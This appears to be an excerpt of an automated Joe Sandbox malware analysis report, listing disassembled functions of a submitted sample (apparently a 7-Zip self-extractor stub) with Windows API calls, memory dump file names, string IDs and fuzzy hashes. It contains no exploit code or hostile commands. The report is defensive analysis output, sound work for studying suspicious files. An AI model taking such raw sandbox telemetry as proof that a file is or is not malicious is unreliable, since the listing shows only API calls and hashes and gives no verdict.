                                                                                                                                        • Instruction Fuzzy Hash: D3F0A732E4672533C232126A6C48FAB769CDF46B51B094136BD04F7390DFA8DC4041ED
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                                                                                        • memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                                                                                        • memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@??3@memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3828600508-0
                                                                                                                                        • Opcode ID: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                                                                                                                        • Instruction ID: 99a0ad40a844e9a3ffa9f049326f458531d7c56977f80c19912095adb51eb10a
                                                                                                                                        • Opcode Fuzzy Hash: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                                                                                                                        • Instruction Fuzzy Hash: 284159B56003048FCB14DF19D880A57B7E9FF88304F14856EEC4A9B346D779E919CBAA
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0041EA30,00000001,0041EA30,0041EA30,00000001,?,00000000), ref: 00405A1E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A80
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A98
                                                                                                                                          • Part of subcall function 004039E7: lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                                                                                                          • Part of subcall function 004039E7: GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                                                                                          • Part of subcall function 004039E7: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                                                                                          • Part of subcall function 004039E7: ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                                                                        • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                        • API String ID: 4038993085-372238525
                                                                                                                                        • Opcode ID: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                                                                                        • Instruction ID: 1d6f72d44ce7b26bafcc2ee4707833dd2b606594c716bb38fa5c6a696ed85d5e
                                                                                                                                        • Opcode Fuzzy Hash: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                                                                                        • Instruction Fuzzy Hash: 05311B7490022AAACF05EF92CD828EEBB79FF58318F10042BE810761E1DB795645DE58
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$ExitProcesslstrcat
                                                                                                                                        • String ID: 0x%p
                                                                                                                                        • API String ID: 2530384128-1745605757
                                                                                                                                        • Opcode ID: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                                                                                        • Instruction ID: 10afd36f4070d89f293b01a92875ce402ef2d19f58a346a7dbf4abb5c9f18492
                                                                                                                                        • Opcode Fuzzy Hash: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                                                                                        • Instruction Fuzzy Hash: 531182B5801208EFCB20EFB5DD85DDA73B8AF04304F00447BE645B3191D778AA948B5A
                                                                                                                                        APIs
                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402E98
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EA1
                                                                                                                                          • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                          • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402EB9
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402ED9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                                                                        • String ID: SetEnvironment
                                                                                                                                        • API String ID: 612612615-360490078
                                                                                                                                        • Opcode ID: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                                                                                        • Instruction ID: 9a1053b96c855abc576ef2a573940a7f22d1fb52882628247968529f0f67b02c
                                                                                                                                        • Opcode Fuzzy Hash: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                                                                                        • Instruction Fuzzy Hash: 66015276900104BADB14AB95DD819EEB7BCEF48314F10416BFD01B21D1DB786A408A99
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(0041E3F0,00000020,?,?,?,?,?,00406547,?,?), ref: 004049C2
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A74
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A7C
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A8B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A93
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$lstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2031685711-0
                                                                                                                                        • Opcode ID: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                                                                                                                        • Instruction ID: d6d6aeb9fd97b078be875a6c61f5694a486b541387e48e1a0363308d58f113ad
                                                                                                                                        • Opcode Fuzzy Hash: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                                                                                                                        • Instruction Fuzzy Hash: 2E21E3B6E40205ABCF206FB5CC029EB77A8EF84355F10447BEE41B72D1E7784D858A99
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000B), ref: 004081F6
                                                                                                                                          • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000C), ref: 004081FF
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 0040883F
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00408850
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00408917
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$??3@
                                                                                                                                        • String ID: 100%%
                                                                                                                                        • API String ID: 2562992111-568723177
                                                                                                                                        • Opcode ID: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                                                                                        • Instruction ID: c0f787396fa6b3de95c2f82887938995bcf82f961e42ceb6ace71c8d1a060617
                                                                                                                                        • Opcode Fuzzy Hash: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                                                                                        • Instruction Fuzzy Hash: 51318171A007059FCB24EF6ACA459AEB7F4EF54704B00052ED982A72D1DB78FE44CB99
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00406EB0,00000000,?,ExecuteFile,0040454C,00000000,00000000,00406EB0,?,waitall,00000000,00000000,?,?,0041E9E8), ref: 00404512
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,0041E9E8), ref: 0040451B
                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00404527
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$_wcsnicmp
                                                                                                                                        • String ID: ExecuteFile
                                                                                                                                        • API String ID: 2823567412-323923146
                                                                                                                                        • Opcode ID: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                                                                                                                        • Instruction ID: a2e0a5f2a3f105f817df911ac3b4dcd355adebb597ea1c4786e8ca368391ef02
                                                                                                                                        • Opcode Fuzzy Hash: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                                                                                                                        • Instruction Fuzzy Hash: BFE04FF25052156BC6008FA5AC84C5BBBADEAC8356B540877F700E3112E735D8198BA6
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00407200,00000000,?,?), ref: 004026BE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004026C5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                                                        • API String ID: 2574300362-3900151262
                                                                                                                                        • Opcode ID: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                                                                                        • Instruction ID: 82409627fcb45dd1da2fa5f3e3d8c344d82775180731f09fcf798d9da7421b86
                                                                                                                                        • Opcode Fuzzy Hash: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                                                                                        • Instruction Fuzzy Hash: D4D0A7B4593608ABD7001B62EE0CFE276A56B40701F4480356400E00F0CBFD44D1CE1E
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00402735,?,0040713A,?,00000000,?,?), ref: 004026F0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004026F7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                                                        • API String ID: 2574300362-736604160
                                                                                                                                        • Opcode ID: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                                                                                        • Instruction ID: 4151df8360ba703b2413aa493284ccd41186626ab8f45a3e4bc2e954db12d2dd
                                                                                                                                        • Opcode Fuzzy Hash: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                                                                                        • Instruction Fuzzy Hash: C7D0C9B86936046AD6505BA6AD0DFE6B6A4AB80B02F9880296804E11E1C6FC4491DA2F
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                                                                                          • Part of subcall function 00402DCE: MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000000,00403130,?,?,00000000,00000000,00000000), ref: 00402E00
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$ByteCharMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1731127917-0
                                                                                                                                        • Opcode ID: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                                                                                        • Instruction ID: 048da0cb2dc02d8916bdec43440a285b354a653a086483b302c5f7621bf0cf9b
                                                                                                                                        • Opcode Fuzzy Hash: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                                                                                        • Instruction Fuzzy Hash: AD31F672804109AACB14EFA6DC829EF77BCEF04315B10443FF856B61E1EB3C9A45C668
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00407468,00000000,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048C6
                                                                                                                                        • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048E3
                                                                                                                                        • wsprintfW.USER32 ref: 00404919
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00404934
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PathTemp$AttributesFilewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1746483863-0
                                                                                                                                        • Opcode ID: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                                                                                        • Instruction ID: 9a23dce76bf07ec62893e724c666a97d340ece38cae1712c454cfb59cab589fa
                                                                                                                                        • Opcode Fuzzy Hash: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                                                                                        • Instruction Fuzzy Hash: 5911E772200204BFD7119F55C845BAEB7B9FF84314F10842EF905D72E1DB79A9118B98
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                          • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                          • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                                                                                        • GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                                                                                          • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                          • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                          • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                          • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                          • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                          • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                          • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                          • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                          • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                          • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                          • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                          • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                          • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                                                                                          • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3043669009-0
                                                                                                                                        • Opcode ID: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                                                                                        • Instruction ID: 3591c2bc138905537439c0aaf451187a84050bff03ea83390e11aea9625765cd
                                                                                                                                        • Opcode Fuzzy Hash: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                                                                                        • Instruction Fuzzy Hash: B911C271F40314ABDB10EBA99D09F9A77BCAB84B04F00446FB241E32D1CAB899008B59
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00407825
                                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 0040784B
                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040785A
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00407889
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1900162674-0
                                                                                                                                        • Opcode ID: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                                                                                        • Instruction ID: b25c457bbae17dd5d72c6f892d860256fe40de5a44a36179f6bad400e189aa1a
                                                                                                                                        • Opcode Fuzzy Hash: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                                                                                        • Instruction Fuzzy Hash: E4116376A00205AFDB149F54DC88BEAB7B8EB04304F0480AAED05A7391DB74AE40CB55
                                                                                                                                        APIs
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00408D3B
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00408D4D
                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 00408D5C
                                                                                                                                          • Part of subcall function 00408763: KillTimer.USER32(?,00000001,?,00408D71), ref: 00408771
                                                                                                                                        • CallNextHookEx.USER32(?,?,?), ref: 00408D7E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientRect$CallHookKillNextScreenTimer
